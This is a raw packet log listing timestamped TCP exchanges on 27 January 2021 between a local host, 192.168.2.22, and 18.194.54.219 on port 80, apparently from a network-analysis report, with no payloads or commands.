Jan 27, 2021 20:03:03.516971111 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516983986 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517009020 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517016888 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517045975 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517052889 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517081976 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517097950 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517119884 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517142057 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517157078 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517178059 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517206907 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517210960 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517249107 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517256021 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517285109 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517299891 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517323017 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517338991 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517360926 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517374039 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517422915 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517430067 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517469883 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517489910 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517508984 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517534018 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517545938 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517549992 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517592907 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517597914 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517633915 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517642021 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517671108 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517684937 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517709017 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.517723083 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.517755032 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.521573067 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.521625042 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.521660089 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.521667004 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.521667004 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.521720886 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.522346973 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.522386074 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.522418976 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.522447109 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.551508904 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.551553011 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.551589012 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.551637888 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.551877975 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.555898905 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.555943012 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.555980921 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556019068 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556058884 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556098938 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556123972 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.556147099 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556190014 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556196928 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.556229115 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556257963 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.556267977 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556305885 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556338072 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.556344032 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556385040 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556422949 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.556435108 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.556513071 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.558187008 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.558232069 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.558305025 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.558363914 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559384108 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559421062 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559458017 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559494972 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559497118 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559511900 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559529066 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559535027 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559554100 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559572935 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559588909 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559612036 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559645891 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559659004 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559667110 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559700966 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559715986 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559739113 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559758902 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559778929 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559788942 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559818029 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559834957 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559855938 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559869051 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559894085 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559911013 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559932947 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559947968 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.559981108 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.559989929 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560024023 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560039997 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560062885 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560070992 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560101032 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560117006 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560142994 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560161114 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560180902 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560218096 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560219049 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560233116 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560257912 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560275078 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560307026 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560314894 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560348988 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560364008 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560385942 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560405016 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560425043 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560461998 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560466051 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560497999 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560501099 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560512066 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560535908 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560563087 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560575008 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560585976 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560626030 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560636044 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560667992 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560682058 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560704947 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560724020 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560744047 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560759068 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560781956 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560798883 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560818911 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560834885 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560858011 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560866117 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560894966 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560909986 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560941935 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.560942888 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.560985088 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561001062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561022043 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561028957 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561059952 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561079979 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561096907 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561130047 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561134100 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561148882 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561172962 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561197042 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561212063 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561229944 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561259985 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561264038 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561301947 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561316013 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561338902 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561357975 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561378002 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561392069 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561434031 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561439037 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561476946 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561497927 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561525106 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561526060 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561568975 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561583042 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561606884 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561625957 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561646938 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561662912 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561685085 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561698914 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561722994 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561722994 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561762094 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561794043 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561800003 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561821938 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561849117 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561853886 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561892986 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561911106 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561932087 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561942101 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.561970949 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.561984062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562010050 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.562014103 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562072039 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562587023 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.562625885 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.562661886 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562673092 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.562681913 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562716007 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.562731028 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562755108 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.562773943 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562793970 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.562798023 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.562855005 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.563189983 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.563230038 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.563254118 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.563268900 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.563291073 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.563308001 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.563323021 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.563374996 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.592623949 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592648029 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592664003 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592679977 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592694998 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592701912 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.592706919 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592721939 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592737913 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.592740059 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.592746019 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.592782974 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.592788935 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.593586922 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.596993923 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597013950 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597029924 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597062111 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597074032 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597116947 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597140074 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597275972 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597321987 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597547054 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597605944 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597651958 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597691059 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597696066 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597709894 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597738028 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597763062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597786903 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597794056 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597897053 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597918987 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597940922 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597958088 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597970963 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.597985029 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597991943 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.597995996 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598009109 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598021030 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598031998 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598043919 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598052025 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598053932 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598066092 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598082066 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598092079 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598100901 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598103046 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598109961 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598114014 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598117113 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598131895 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598140955 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598149061 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598151922 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598164082 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598175049 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598191977 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598200083 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598206043 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598210096 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598645926 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598779917 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598802090 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598820925 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598828077 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598836899 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.598843098 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.598860979 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.599198103 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603034973 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603060961 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603082895 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603106022 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603127956 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603152990 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603183985 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603194952 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603207111 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603209972 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603212118 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603216887 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603220940 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603233099 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603235960 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603257895 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603259087 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603283882 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603291035 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603302002 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603312016 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603332996 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603348970 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603354931 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603365898 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603372097 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603377104 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603394985 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603399038 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603420973 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603441000 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603445053 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603449106 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603456020 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.603466988 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.603487968 CET	80	49165	18.194.54.219	192.168.2.22
